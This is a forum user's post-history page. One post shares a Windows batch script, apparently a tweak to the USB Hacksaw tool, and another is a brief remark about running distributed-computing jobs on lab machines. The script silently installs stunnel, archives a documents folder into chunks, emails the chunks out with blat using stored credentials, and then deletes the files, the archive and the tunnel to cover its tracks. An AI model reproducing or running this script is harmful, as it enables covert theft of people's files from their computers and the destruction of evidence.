Jump to content

hauser

Members
  • Posts

    2
  • Joined

  • Last visited

Everything posted by hauser

  1. to fix all those ulgy blat commands in the send.bat file replace with one cleaner line useing the for command. :: Configure Email Options SET emailfrom= SET emailto= SET password= :: Archive documents in 1MB chunks rar a goodies.rar .docs -v1024k -vn stunnel-4.11.exe -install -quiet net start stunnel GOTO badhack :cleanup :: Stop stunnel rem taskkill /f /im stunnel-4.11.exe (??) net stop stunnel stunnel-4.11.exe -uninstall -quiet :: Delete documents rmdir /s /q docs :: Delete archive del /q /f goodies*.* GOTO end :badhack REM Damn this is crude. Welcome to sleepless, I don't give a rats ass, just work damnit, hacking kids! REM See show notes at http://www.hak5.org/wiki/USB_Hacksaw for a better method to do this. I'm not proud of it. for %%i in (goodies.r*) do blat.exe %%i -base64 -to %emailto% -u %emailfrom% -pw %password% -f %emailfrom% -server 127.0.0.1:1099 GOTO cleanup :end
  2. Wow, that's quite in-depth. Edit: Who tf is hauser? 90 active processors, holy cow. hauser is me ;) i've got 2 labs of 30 dual core p4's that i was able to use over the weekend :D got about 20 units that should finish in the next couple days.
×
×
  • Create New...